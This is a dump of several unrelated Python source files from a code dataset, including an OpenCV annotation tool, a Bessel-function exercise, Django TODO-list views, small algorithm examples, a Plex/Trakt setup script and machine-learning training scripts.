os.path.basename(sys.argv[0])\n        self.logger = logging.getLogger(program)\n        logging.basicConfig(format='%(asctime)s : %(levelname)s : %(message)s')\n\n        # load config file\n        f = open(self.CONFIG_YAML, 'r')\n        self.config = yaml.load(f)\n        f.close()\n\n        # set dataset path\n        self.pos_img_dir = self.config['dataset']['pos_img_dir']\n\n        # set output path\n        self.my_annotation_dir = self.config['output']['my_annotation_dir']\n        self.my_annotation_img_dir = self.config['output']['my_annotation_img_dir']\n\n        # create output paths\n        if not os.path.isdir(self.my_annotation_dir):\n            os.makedirs(self.my_annotation_dir)\n        if not os.path.isdir(self.my_annotation_img_dir):\n            os.makedirs(self.my_annotation_img_dir)\n\n        # set array of all file names\n        self.my_annotation_files = [file_name for file_name in os.listdir(self.my_annotation_dir) if not file_name.startswith('.')]\n        self.my_annotation_files.sort()\n        self.pos_img_files = [file_name for file_name in os.listdir(self.pos_img_dir) if not file_name.startswith('.')]\n        self.pos_img_files.sort()\n\n        # initialize mouse event\n        cv2.namedWindow(self.GENERATOR_WINDOW_NAME)\n        cv2.setMouseCallback(self.GENERATOR_WINDOW_NAME, self.on_mouse)\n\n        # mouse location\n        self.im_orig = None\n        self.start_pt = (0, 0)\n        self.end_pt = (0, 0)\n        self.mouse_dragging = False\n        self.bboxes = []\n\n    def on_mouse(self, event, x, y, flags, param):\n\n        x = min(max(x, 0), self.im_orig.shape[1] - 1)\n        y = min(max(y, 0), self.im_orig.shape[0] - 1)\n\n        if event == cv2.EVENT_LBUTTONDOWN:\n            self.logger.info('DOWN: %d, %d', x, y)\n            self.start_pt = (x, y)\n            self.end_pt = (x, y)\n            self.mouse_dragging = True\n        elif event == cv2.EVENT_LBUTTONUP:\n            self.logger.info('UP: %d, %d', x, y)\n            self.end_pt = (x, y)\n            self.bboxes.append((self.start_pt, self.end_pt))\n            self.start_pt = self.end_pt = (0, 0)\n            self.mouse_dragging = False\n        elif event == cv2.EVENT_MOUSEMOVE and self.mouse_dragging:\n            # self.logger.info('DRAG: %d, %d', x, y)\n            self.end_pt = (x, y)\n\n\n    
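# Quick reference for the interactive editor implemented below (derived from its\n    # key handling): 'q' quits without saving, SPACE saves the annotation pickle plus a\n    # bbox preview image, and 'd' removes the most recently drawn bounding box.\n    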
def generate_my_annotation(self, img_path, edit=False):\n\n        # annotation path\n        head, tail = os.path.split(img_path)\n        # root, ext = os.path.splitext(tail)\n        annotation_path = self.my_annotation_dir + tail + '.pkl'\n\n        # bbox path\n        bbox_path = self.my_annotation_img_dir + 'bbox_' + tail\n\n        # load image\n        self.im_orig = cv2.imread(img_path)\n\n        # if edit is true, load bbox info from annotation file\n        if edit:\n            f = open(annotation_path, 'rb')\n            self.bboxes = pickle.load(f)\n            f.close()\n\n        while True:\n            im_copy = self.im_orig.copy()\n\n            # draw rectangles (tuple equality, not 'is not': identity checks on tuples are unreliable)\n            if self.start_pt != (0, 0) and self.end_pt != (0, 0):\n                cv2.rectangle(im_copy, self.start_pt, self.end_pt, (0, 0, 255), 1)\n            for box in self.bboxes:\n                cv2.rectangle(im_copy, box[0], box[1], (0, 255, 0), 1)\n\n            # show image to generate annotations\n            cv2.imshow(self.GENERATOR_WINDOW_NAME, im_copy)\n            key = cv2.waitKey(10)\n            if key == ord('q'):  # 'q' key\n                cv2.destroyAllWindows()\n                return False\n            elif key == 32:  # space key\n                self.logger.info('saving annotation data: %s', annotation_path)\n                f = open(annotation_path, 'wb')\n                pickle.dump(self.bboxes, f)\n                f.close()\n                self.logger.info('saving bounding box data: %s', bbox_path)\n                cv2.imwrite(bbox_path, im_copy)\n                self.bboxes = []\n                return True\n            elif key == ord('d'):  # 'd' key\n                if len(self.bboxes) > 0:\n                    self.bboxes.pop()\n                else:\n                    self.logger.info('no bounding boxes to delete')\n        return True\n\n    def generate_annotations(self, skip=True):\n\n        for pos_image_file in self.pos_img_files:\n\n            edit = False\n            if pos_image_file in [os.path.splitext(annotation_file)[0] for annotation_file in self.my_annotation_files]:\n                if skip:\n                    self.logger.info('skipping: %s already has an annotation', pos_image_file)\n                    continue\n                else:\n                    self.logger.info('edit: %s already has an annotation', pos_image_file)\n                    edit = True\n            else:\n                self.logger.info('new: %s', pos_image_file)\n\n            pos_img_path = self.pos_img_dir + pos_image_file\n            is_continue = self.generate_my_annotation(pos_img_path, edit)\n            if not is_continue:\n                return\n\n    def create_positive_dat(self):\n        output_text = \"\"\n        self.logger.info(\"begin creating positive.dat\")\n        for file_name in self.my_annotation_files:\n\n            # annotation path\n            annotation_path = self.my_annotation_dir + file_name\n            f = open(annotation_path, 'rb')\n            bboxes = pickle.load(f)\n            f.close()\n            root, ext = os.path.splitext(file_name)\n            output_text += \"%s %d \" % (self.pos_img_dir + root, len(bboxes))\n            for bbox in bboxes:\n                x_min, y_min = min(bbox[0][0], bbox[1][0]), min(bbox[0][1], bbox[1][1])\n                x_max, y_max = max(bbox[0][0], bbox[1][0]), max(bbox[0][1], bbox[1][1])\n                w = x_max - x_min\n                h = y_max - y_min\n                output_text += \"%d %d %d %d \" % (x_min, y_min, w, h)\n            output_text += \"\\n\"\n        # print output_text\n        self.logger.info(\"writing data to positive.dat\")\n        f = open('positive.dat', 'w')\n        f.write(output_text)\n        f.close()\n        self.logger.info(\"completed writing data to positive.dat\")\n\nif __name__ == '__main__':\n\n    # log level setting\n    logging.root.setLevel(level=logging.INFO)\n\n    # generate AnnotationGenerator\n    generator = AnnotationGenerator()\n\n    # generate annotations by GUI\n    # if given True, the generator skips files that already have annotations (default)\n    # if given False, you can edit files that already have annotations\n    generator.generate_annotations(True)\n\n    # create positive.dat for opencv\n    
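# positive.dat lines written by create_positive_dat() above take the form\n    # \"<image path> <n boxes> x y w h [x y w h ...]\"; this matches the info-file format\n    # of OpenCV's opencv_createsamples tool (an assumption: the target tool is not named here).\n    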
generator.create_positive_dat()\n","sub_path":"annotation_generator.py","file_name":"annotation_generator.py","file_ext":"py","file_size_in_byte":6843,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"107007506","text":"# CTA200H Question 3\n\nimport numpy as np\nimport pylab as plt\nimport scipy as sc\nimport matplotlib.pyplot as py\nfrom time import time\nfrom scipy import special\n\n# Question 3 (a)\n\ndef fm(theta, m, x):\n    \"\"\"\n    Integrand in the Bessel function Jm(x).\n    \"\"\"\n    return np.cos((m*theta) - x*np.sin(theta))/np.pi\n\ndef simpson_integration(f, N, a, b, m, x):\n    \"\"\"\n    Simpson method of integration.\n    f is the integrand being integrated\n    N is the number of sections in interval\n    a is the start of the interval\n    b is the end of the interval\n    m is a nonnegative integer needed for integrand of bessel function\n    \"\"\"\n    h = (b-a)/N #width of the quadratic curves\n    #implementing Simpson's rule equation\n    t1 = f(a, m, x) + f(b, m, x) #setting initial sum value\n    t2 = 0\n    #looping through odd terms of sum\n    for k in range(1,N,2):\n        t2 += f(a + k*h, m, x)\n    t2 *= 4\n\n    t3 = 0\n    for k in range(2,N,2):\n        t3 += f(a + k*h, m, x)\n    t3 *= 2\n\n    #multiplying total sum\n    t = (h/3) * (t1 + t2 + t3)\n\n    #print(\"Integral from simpson's rule = \", t)\n    return t\n\ndef J(m, x):\n    \"\"\"\n    Bessel function Jm(x).\n    m is a nonnegative int\n    x >= 0\n    \"\"\"\n    N = 1000 #number of sections splitting interval\n    a = 0 #start of interval\n    b = np.pi #end of interval\n    \n    s = simpson_integration(fm, N, a, b, m, x)\n    \n    return s\n\n\nx = np.linspace(0, 20, 100)\n#running bessel function for m=0,1,2,3\ny_0 = J(0, x)\ny_1 = J(1, x)\ny_2 = J(2, x)\ny_3 = J(3, x)\n\n#plotting bessel function for m=0,1,2,3\nplt.figure(figsize=(10,6))\nplt.plot(x, y_0, label='simpson: m=0', marker='.', linestyle='none', color='b')\nplt.plot(x, y_1, label='simpson: m=1', marker='.', linestyle='none', color='orange')\nplt.plot(x, y_2, label='simpson: m=2', marker='.', linestyle='none', color='g')\nplt.plot(x, y_3, label='simpson: m=3', marker='.', linestyle='none', color='r')\n\n# using scipy's special.jv function to find y values and compare them to\n# Simpson's method for m=0,1,2,3\ny_sc0 = sc.special.jv(0, x)\ny_sc1 = sc.special.jv(1, x)\ny_sc2 = sc.special.jv(2, x)\ny_sc3 = sc.special.jv(3, x)\n\n#plotting the results from scipy's function overtop our own results\nplt.plot(x, y_sc0, label='scipy: m=0', color='b')\nplt.plot(x, y_sc1, label='scipy: m=1', color='orange')\nplt.plot(x, y_sc2, label='scipy: m=2', color='g')\nplt.plot(x, y_sc3, label='scipy: m=3', color='r')\n\nplt.legend()\nplt.xlabel(\"x\")\nplt.ylabel(\"Jm(x)\")\nplt.title(\"Bessel Function for Different m Values:\\nSimpson's vs. 
Scipy Method\")\nplt.show()\nplt.clf()\n\n#==============================================================================\n\n# Question 3 b\n\ndef I(I_0, lamb, r):\n \"\"\"\n Intensity pattern (point spread function) from the telescope.\n I_0 intensity at the centre\n lamb wavelength of light\n r is defined to be equal to aq/R\n \"\"\"\n x = 2*np.pi*r / lamb \n# return I_0 * (2*J(1,x)/x)**2\n # use scipy special function bessel function to speed things up\n return I_0 * (2*sc.special.jv(1, x)/x)**2\n\n# define intensity parameters\nI_0 = 1 # intensity at centre\nlamb = 0.5 # wavelength in µm\n\n# create a 2d grid\nx = np.arange(-1, 1, 0.01)\ny = np.arange(-1, 1, 0.01)\nxx, yy = np.meshgrid(x, y)\nr = np.sqrt(xx**2 + yy**2)\nz = I(I_0, lamb, r)\n\n# plot intensity pattern\nplt.figure(figsize=(6,6))\nplt.imshow(z, extent=[-1,1,-1,1])\nplt.title(\"Intensity Pattern (Normal)\\nwith I_0 = {0}, $\\lambda$ = {1}µm\".format(I_0,lamb))\nplt.xlabel(\"x in µm\")\nplt.ylabel(\"y in µm\")\nplt.show()\nplt.clf()\n\n# plot intensity pattern with higher contrast to see the behaviour more clearly\nplt.figure(figsize=(6,6))\nplt.imshow(z, vmin = 0, vmax = 0.1, extent=[-1,1,-1,1])\nplt.title(\"Intensity Pattern (High Contrast vmax = 0.1)\\nwith I_0 = {0}, $\\lambda$ = {1}µm\".format(I_0,lamb))\nplt.xlabel(\"x in µm\")\nplt.ylabel(\"y in µm\")\nplt.show()\nplt.clf()\n\n\n#==============================================================================\n\n# Question 3 c\n\nfrom scipy import signal\n\n# Import some image data\nfrom skimage import data\ncamera = data.camera()\n\n# Define grid\nx1 = np.linspace(-1.5, 1.5, 512)\ny1 = np.linspace(-1.5, 1.5, 512)\n[X,Y] = np.meshgrid(x1,y1)\nr1 = np.sqrt(X**2 + Y**2)\n\nv_I = np.vectorize(I) # Vectorize point spread function\nz1 = v_I(I_0, 0.2, r1) # values of point spread function on this grid\n\n# Convolution\nconv = signal.fftconvolve(camera,z1) # other methods took indefinite time\n\n# Plotting original image\nplt.figure(0)\nplt.imshow(camera)\nplt.title(\"Original Image\")\nplt.show()\n\n# Plotting convolved image\nplt.figure(1)\nplt.imshow(conv)\nplt.title(\"Convolved Image\")\nplt.xlim(200,800)\nplt.ylim(800,200)\nplt.show()\n\n\n","sub_path":"question3/question3.py","file_name":"question3.py","file_ext":"py","file_size_in_byte":4637,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"386080959","text":"\"\"\"The views module.\"\"\"\n\nimport dateutil.parser\nimport json\n\nfrom django.http import HttpResponse\nfrom django.contrib.auth.decorators import login_required\nfrom django.contrib.auth import logout as auth_logout\nfrom django.shortcuts import render, redirect\nfrom django.contrib.auth import models as auth_models\nfrom rest_framework import viewsets\nimport serializers\n\nimport models as main_app_models\n\n\nclass UserViewSet(viewsets.ReadOnlyModelViewSet):\n\n queryset = auth_models.User.objects.all()\n serializer_class = serializers.UserSerializer\n\n\nclass CommentViewSet(viewsets.ModelViewSet):\n\n queryset = main_app_models.Comment.objects.all()\n serializer_class = serializers.CommentSerializer\n\n\nclass TaskViewSet(viewsets.ModelViewSet):\n\n queryset = main_app_models.Task.objects.all()\n serializer_class = serializers.TaskSerializer\n\n\nclass TODOListViewSet(viewsets.ModelViewSet):\n\n queryset = main_app_models.TODOList.objects.all()\n serializer_class = serializers.TODOListSerializer\n\n\n@login_required\ndef home(request):\n\n context = {}\n return render(request, 'index.html', 
context)\n\n\ndef logout(request):\n    \"\"\"Log out user.\"\"\"\n    auth_logout(request)\n    return redirect(\"/\")\n\n\ndef todo_list_form(request):\n\n    if request.method == \"POST\":\n\n        post_data = json.loads(request.body)\n\n        if \"id\" in post_data:\n\n            todo_list = main_app_models.TODOList.objects.get(pk=int(post_data[\"id\"]))\n            todo_list.title = post_data[\"title\"]\n            todo_list.save()\n\n        else:\n\n            main_app_models.TODOList(title=post_data[\"title\"]).save()\n\n    return HttpResponse()\n\n\ndef task_form(request):\n\n    if request.method == \"POST\":\n\n        post_data = json.loads(request.body)\n\n        if \"id\" in post_data:\n\n            task = main_app_models.Task.objects.get(pk=int(post_data[\"id\"]))\n\n            if \"deadline\" in post_data:\n\n                if post_data[\"deadline\"]:\n                    task.deadline = dateutil.parser.parse(post_data[\"deadline\"])\n\n            if \"description\" in post_data:\n\n                task.description = post_data[\"description\"]\n\n            if \"done\" in post_data:\n\n                task.done = post_data[\"done\"]\n\n            task.save()\n\n        else:\n\n            params = dict()\n\n            params[\"description\"] = post_data[\"description\"]\n\n            if \"deadline\" in post_data:\n\n                params[\"deadline\"] = dateutil.parser.parse(post_data[\"deadline\"])\n\n            task = main_app_models.Task(**params)\n            task.save()\n\n            todo_list = main_app_models.TODOList.objects.get(pk=int(post_data[\"parent_list\"]))\n            todo_list.tasks.add(task)\n            todo_list.save()\n\n    return HttpResponse()\n\n\ndef comment_form(request):\n\n    if request.method == \"POST\":\n\n        post_data = json.loads(request.body)\n\n        comment = main_app_models.Comment(text=post_data[\"text\"], author=request.user)\n        comment.save()\n\n        parent_task = main_app_models.Task.objects.get(pk=int(post_data[\"parent_task\"]))\n        parent_task.comments.add(comment)\n        parent_task.save()\n\n    return HttpResponse()\n\n\ndef delete_task(request):\n\n    if request.method == \"POST\":\n\n        task = main_app_models.Task.objects.get(pk=int(json.loads(request.body)[\"id\"]))\n\n        for comment in task.comments.all():\n\n            comment.delete()\n\n        task.delete()\n\n    return HttpResponse()\n\n\ndef delete_todo_list(request):\n\n    if request.method == \"POST\":\n\n        todo_list = main_app_models.TODOList.objects.get(pk=int(json.loads(request.body)[\"id\"]))\n\n        for task in todo_list.tasks.all():\n\n            for comment in task.comments.all():\n\n                comment.delete()\n\n            task.delete()\n\n        todo_list.delete()\n\n    return HttpResponse()\n","sub_path":"main_app/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":3771,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"255751125","text":"# Code for binary search\n\n\ndef binary_search(arr, low, high, x):\n    \"\"\"\n    Parameters:\n    1)arr is the sorted array in which we will be finding the element\n    2)low is the lower bound of the interval in which we will\n    be finding the element index\n    3)high is the upper bound of the interval in which we will\n    be finding the element index\n    4)x is the element we are trying to find the index of\n\n    Output: the index of the element x in the array arr.\n    If the element x does not exist in array arr, -1 will\n    be returned.\n    \"\"\"\n\n    if high >= low:  # every branch below returns, so a plain if/else suffices (no loop needed)\n        mid = (high + low) // 2\n        if arr[mid] == x:  # Base Case 1\n            return mid\n        elif arr[mid] < x:  # Recursive Case 1\n            return binary_search(arr, mid + 1, high, x)\n        else:  # Recursive Case 2\n            return binary_search(arr, low, mid - 1, x)\n    else:  # Base Case 2: element not found\n        return -1\n\n\nprint(binary_search([1, 24, 28, 30, 40, 52], 0, 5, 
28))\n","sub_path":"3_advanced/chapter18/examples/binary_search.py","file_name":"binary_search.py","file_ext":"py","file_size_in_byte":981,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"15297434","text":"# Write a program to check whether the input letter is a vowel or not using if-else.\n\nalphabet = input(\"Enter the alphabet: \").lower()\n\n\nif alphabet in ('a','e','i','o','u') :\n    print(\"%s is a vowel.\" % alphabet)\nelse:\n    print(\"%s is not a vowel.\" % alphabet)\n\n\n\n\n\n\n","sub_path":"vowelorNot.py","file_name":"vowelorNot.py","file_ext":"py","file_size_in_byte":283,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"382029809","text":"from Non_linear import newton_raphson,call_func\r\n\r\ndef mul(a,lst): #multiplication of elements of a list with a scalar\r\n    return [a*i for i in lst]\r\ndef add(*lst): #list addition similar to vector addition\r\n    return [sum(i) for i in zip(*lst)]\r\n\r\n\r\n#---------------*********************--------------------#\r\n\r\ndef euler_forward(f,y0,x0,xstop,N,args=None):\r\n    h = (xstop - x0) / N\r\n    result = [y0];c=[x0]\r\n    iter=0\r\n    while iter < N:\r\n        # the body of this loop, and the rk4() integrator used below, are missing from\r\n        # the source; rk4(f, y0, a, b, N, args) -> (x, states) is assumed from its call sites\r\n        ...\r\n\r\n#helper for the shooter method; signature assumed from the recursive calls below\r\ndef _shooter_helper(f, ya, yb, a, b, r, s, epsilon, N, args, no_iteration):\r\n    if no_iteration>50: #recursion limit\r\n        print(\"The recursion limit has been reached.\")\r\n        return r\r\n    no_iteration+=1\r\n    c1=r[0][-1] #boundary value at choice1\r\n    choice1=r[1][0]\r\n    if abs(c1-yb) < epsilon: return r\r\n    c2=s[0][-1] #boundary value at choice2 (reconstructed to mirror c1)\r\n    choice2=s[1][0]\r\n    if (c1-yb)*(c2-yb) > 0 or c1==c2:\r\n        print(\"The choices are not good\")\r\n        return r\r\n    choice=(yb-c1)*(choice2-choice1)/(c2-c1) + choice1\r\n    q,p=rk4(f,[ya,choice],a,b,N,args)\r\n    c=p[0][-1]\r\n    if abs(c - yb) < epsilon: return p\r\n    if (c1 - yb) * (c - yb) > 0 :  #change the choice1\r\n        return _shooter_helper(f, ya, yb, a, b, p, s,epsilon, N, args, no_iteration + 1)\r\n    else: #change the choice2\r\n        return _shooter_helper(f, ya, yb, a, b, r, s,epsilon, N, args, no_iteration + 1)\r\n\r\n\r\n#shooter method\r\ndef shooter(f,ya,yb,choice1,choice2,a,b,N,epsilon=0.0001,args=None):\r\n    x,r=rk4(f,[ya,choice1],a,b,N,args)\r\n    x,s=rk4(f,[ya,choice2],a,b,N,args)\r\n    return x, _shooter_helper(f, ya, yb, a, b, r,s ,epsilon, N, args, 0)\r\n\r\n\r\n#-----------------------**********************-----------------------------#\r\n\r\ndef print_to_file(file_name,*lst):\r\n    f=open(file_name,\"w\")\r\n    for i in zip(*lst):\r\n        n=len(i)-1\r\n        for j in range(n+1):\r\n            if j 0:\n            param = json.loads(param)\n\n    '''Deserialize the request headers: turn the str into a dict'''\n    header=datas[ExcelVarles1.headersdata]\n    if len(str(header).strip())==0:pass\n    elif len(str(header).strip())>0:\n        header=json.loads(header)\n    #print('header',header)\n\n    '''\n    1. Get the test cases of every prerequisite test point\n    2. Execute the prerequisite test points\n    3. Collect their results\n    4. Use those results to replace the variables of the corresponding test point\n    '''\n\n    # execute the test point linked to the precondition; call its API to obtain the response\n    r=obj.post(\n        url=excel.case_prev(datas[ExcelVarles1.casePre])[ExcelVarles1.caseUrl],\n        json=json.loads(excel.case_prev(datas[ExcelVarles1.casePre])[ExcelVarles1.paramdata]))\n    prevResult=r.json()['access_token']\n\n    # use the response to replace the variables in the request headers of the test point under test\n    header=excel.prevHeaders(prevResult)\n\n    # handle the expected status code\n    status_code=int(datas[ExcelVarles1.status_code])\n\n    def case_assert_result(r):\n        assert r.status_code==status_code\n        assert datas[ExcelVarles1.expect] in json.dumps(r.json(), ensure_ascii=False)\n\n    if datas[ExcelVarles1.method]=='get':\n        r=obj.get(url=datas[ExcelVarles1.caseUrl],\n                  header=header)\n        case_assert_result(r=r)\n    elif datas[ExcelVarles1.method]=='post':\n        r=obj.post(url=datas[ExcelVarles1.caseUrl],\n                   json=param,\n                   header=header)\n        writeContent(content=str(r.json()[0]['datas']['id']))\n        case_assert_result(r=r)\n    elif datas[ExcelVarles1.method]=='delete':\n        url=str(datas[ExcelVarles1.caseUrl]).replace('{bookID}',readContent())\n        r=obj.delete(url=url,header=header)\n        case_assert_result(r=r)\n\nif __name__=='__main__':\n    pytest.main([\"-s\",\"-v\",\"test_login_token_book.py\"])","sub_path":"tests/test_login_token_book.py","file_name":"test_login_token_book.py","file_ext":"py","file_size_in_byte":2377,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"163451630","text":"from plexapi.myplex import MyPlexAccount\nimport utils\nfrom os import path\nimport trakt\nimport trakt.core\nimport trakt.users\n\ntrakt.core.CONFIG_PATH = path.join(path.dirname(path.abspath(__file__)), \".pytrakt.json\")\nenv_file = path.join(path.dirname(path.abspath(__file__)), \".env\")\n\nplex_needed = utils.input_yesno(\"-- Plex --\\nAre you logged into this server with a Plex account?\")\nif plex_needed:\n    username = input(\"Please enter your Plex username: \")\n    password = input(\"Please enter your Plex password: \")\n    servername = input(\"Now enter the server name: \")\n    account = MyPlexAccount(username, password)\n    plex = account.resource(servername).connect()  # returns a PlexServer instance\n    token = plex._token\n    users = account.users()\n    if users:\n        print(\"Managed user(s) found:\")\n        for user in users:\n            if user.friend is True:\n                print(user.title)\n        print(\"If you want to use a managed user enter its username,\")\n        name = input(\"if you want to use your main account just press enter: \")\n        while name:\n            try:\n                useraccount = account.user(name)\n            except:\n                if name != \"_wrong\":\n                    print(\"Unknown username!\")\n                name = input(\"Please enter a managed username (or just press enter to use your main account): \")\n                if not name:\n                    print(\"Ok, continuing with your account \" + username)\n                    break\n                continue\n            try:\n                token = account.user(name).get_token(plex.machineIdentifier)\n                username = name\n                break\n            except:\n                print(\"Could not find the managed user \\'\"+name+\"\\' on this server!\")\n                name = \"_wrong\"\n    with open(env_file, 'w') as txt:\n        txt.write(\"PLEX_USERNAME=\" + username + \"\\n\")\n        txt.write(\"PLEX_TOKEN=\" + token + \"\\n\")\n        txt.write(\"PLEX_BASEURL=\" + plex._baseurl + \"\\n\")\n        txt.write(\"PLEX_FALLBACKURL=http://localhost:32400\\n\")\n    print(\"Plex token and baseurl for {} have been added in .env file:\".format(username))\n    print(\"PLEX_TOKEN={}\".format(token))\n    print(\"PLEX_BASEURL={}\".format(plex._baseurl))\nelse:\n    with open(env_file, \"w\") as txt:\n        txt.write(\"PLEX_USERNAME=-\\n\")\n        txt.write(\"PLEX_TOKEN=-\\n\")\n        
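# the '-' placeholders above mark the no-Plex-account case; only the local\n        # fallback base URL written below is meaningful in that configuration\n        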
txt.write(\"PLEX_BASEURL=http://localhost:32400\\n\")\n\ntrakt.core.AUTH_METHOD=trakt.core.DEVICE_AUTH\nprint(\"-- Trakt --\")\nclient_id, client_secret = trakt.core._get_client_info()\ntrakt.init(client_id=client_id, client_secret=client_secret, store=True)\ntrakt_user = trakt.users.User('me')\nwith open(env_file, \"a\") as txt:\n txt.write(\"TRAKT_USERNAME=\" + trakt_user.username + \"\\n\")\nprint(\"You are now logged into Trakt. Your Trakt credentials have been added in .env and .pytrakt.json files.\")\nprint(\"You can enjoy sync! \\nCheck config.json to adjust settings.\")\nprint(\"If you want to change Plex or Trakt account, just edit or remove .env and .pytrakt.json files.\")","sub_path":"get_env_data.py","file_name":"get_env_data.py","file_ext":"py","file_size_in_byte":3033,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"59000243","text":"# Felix Hu\n\n# Using Scikit as primary ML library\n\nimport numpy as np\nimport pandas as pd\nfrom sklearn import metrics \nfrom sklearn.model_selection import cross_val_score\nfrom sklearn.datasets import make_classification\nfrom sklearn.tree import DecisionTreeClassifier\nfrom sklearn.ensemble import AdaBoostClassifier\nfrom sklearn.ensemble import GradientBoostingClassifier\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.metrics import confusion_matrix\nfrom sklearn.utils.class_weight import compute_sample_weight\nimport matplotlib.pyplot as plt\nimport pickle # model persistence\n\n# STEP 0 Data\n\ndata = pd.read_csv('sqlite_data_ML_iterativeBuild_P70L30.csv')\nprint(\"COLUMNS: \"+str(data.columns))\n\n# Features we don't care about\ndel data[\"id\"]\ndel data[\"option_expiration\"]\ndel data[\"flow_ticker\"]\ndel data[\"flow_order_time\"]\ndel data[\"order_status\"]\ndel data[\"symbol\"]\ndel data[\"events\"]\ndel data[\"sector\"]\n#del data[\"option_reference_price\"]\n#del data[\"option_theta\"]\n#del data[\"option_vega\"]\n\n# TEMP, we actually want these but they contain Nans\n# print(data.isna().any())\n\ndata = data.dropna(how='any')\n\ndata = pd.get_dummies(data, columns=[\"option_call_or_put\", \"option_order_type\"])\n\nfeature_list = list(data.columns)\nprint(\"COLUMNS TO BE USED: \"+str(feature_list))\n\nprint(\"Number of unprofitable vs profitable:\")\nprint(data[\"profitable\"].value_counts())\n\nlabels = np.array(data[\"profitable\"])\ndata = data.drop(\"profitable\", axis = 1)\nprint(data.head(5))\n\ndata = np.array(data)\n\ntrain_data, test_data, train_labels, test_labels = train_test_split(data, labels, test_size = 0.1)\n\nclass_weight = \"balanced\"\n\nprint('Training Features Shape:', train_data.shape)\nprint('Training Labels Shape:', train_labels.shape)\nprint('Testing Features Shape:', test_data.shape)\nprint('Testing Labels Shape:', test_labels.shape)\nprint('Sample weights: '+ str(compute_sample_weight(class_weight=class_weight, y=train_labels)))\n\n# STEP 1 Training\n\n# best:\n# P125L30, maxdepth=3, 2750, 3000\n# P70L30, max_depth=4,trees=2750-3000, >40%\nada = GradientBoostingClassifier(n_estimators=2750, max_depth=4, validation_fraction=0.1)\n#ada.fit(train_data, train_labels, sample_weight=compute_sample_weight(class_weight=\"balanced\", y=train_labels))\nada.fit(train_data, train_labels, sample_weight=compute_sample_weight(class_weight=class_weight, y=train_labels))\n\n# STEP 2 Errors\nprint(\"TRAINING ACCURACY: \"+str(ada.score(train_data, train_labels)))\nprint(\"TESTING ACCURACY: \"+str(ada.score(test_data, 
test_labels)))\n\npredictions = ada.predict(test_data)\nconf_mat = confusion_matrix(test_labels, predictions)\nprint(conf_mat)\n\n#print(rf.feature_importances_)\n\n# STEP 3 Save Ensemble\nfilename = 'GradBoost_1.sav'\npickle.dump(ada, open(filename, 'wb'))","sub_path":"GradientBoost.py","file_name":"GradientBoost.py","file_ext":"py","file_size_in_byte":2738,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"57966173","text":"#!/usr/bin/env python\n# encoding: utf-8\n\nimport tensorflow as tf\n\nimport pdb\nfrom lc import *\nfrom tensorflow.contrib.layers import *\nfrom tensorflow.contrib.keras.python.keras.layers import *\n\nconfig.LEARNING_RATE = 0.01\nconfig.DECAY_STEP = 75\nconfig.DECAY_RATE = 0.975\nconfig.L2_LAMBDA = 0.05\nconfig.STOP_THRESHOLD = -1\nconfig.RESTORE_FROM = None # \"08-10-17_04_10\"\n\nd = {\"name\": \"lambda_1\", \"discription\": \"TEST_D\", }\nl = Loader(d)\n\n'''\n def apply(self, inputs, *args, **kwargs):\n Apply the layer on a input.\n\n This simply wraps `self.__call__`.\n\n Arguments:\n inputs: Input tensor(s).\n *args: additional positional arguments to be passed to `self.call`.\n **kwargs: additional keyword arguments to be passed to `self.call`.\n'''\n\n\ndef max_out(inputs, num_units, axis=None):\n\n shape = inputs.get_shape().as_list()\n if shape[0] is None:\n shape[0] = -1\n if axis is None: # Assume that channel is the last dimension\n axis = -1\n num_channels = shape[axis]\n if num_channels % num_units:\n raise ValueError('number of features({}) is not '\n 'a multiple of num_units({})'.format(num_channels, num_units))\n shape[axis] = num_units\n shape += [num_channels // num_units]\n outputs = tf.reduce_max(tf.reshape(inputs, shape), -1, keep_dims=False)\n return outputs\n\n\ndef five_layers_lrelu(x, ref_y, test):\n test = None if not test else True\n # lrelu = LeakyReLU()\n hid1 = fully_connected(\n x, 1000, activation_fn=lambda input: max_out(input, 500), reuse=test, scope=\"layer1\")\n hid2 = fully_connected(\n hid1, 1000, activation_fn=lambda input: max_out(input, 250), reuse=test, scope=\"layer2\")\n hid3 = fully_connected(\n hid2, 1000, activation_fn=lambda input: max_out(input, 125), reuse=test, scope=\"layer3\")\n hid4 = fully_connected(\n hid3, 1000, activation_fn=lambda input: max_out(input, 50), reuse=test, scope=\"layer4\")\n hid5 = fully_connected(\n hid4, 1000, activation_fn=lambda input: max_out(input, 25), reuse=test, scope=\"layer5\")\n y = fully_connected(hid5, 1, activation_fn=tf.identity,\n reuse=test, scope=\"fc\")\n if not test:\n analysis.add_RMSE_loss(y, ref_y, \"train\")\n analysis.add_L2_loss()\n else:\n analysis.add_RMSE_loss(y, ref_y, \"test\")\n\ndef linear(x, ref_y, test):\n test = None if not test else True\n y = fully_connected(x, 1, activation_fn=tf.identity,\n reuse=test, scope=\"fc\")\n if not test:\n analysis.add_RMSE_loss(y, ref_y, \"train\")\n # analysis.add_L2_loss()\n else:\n\n analysis.add_RMSE_loss(y, ref_y, \"test\")\n\n\ndef apply_graph(graph):\n g1 = tf.Graph()\n with g1.as_default():\n x1, y1 = l.train()\n graph(x1, y1, False)\n\n x2, y2 = l.validation()\n graph(x2, y2, True)\n\n summarize_collection(\"trainable_variables\")\n summarize_collection(\"losses\")\n return g1\n\n\nwith apply_graph(five_layers_lrelu).as_default():\n train.simple_train(50000)\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3046,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} 
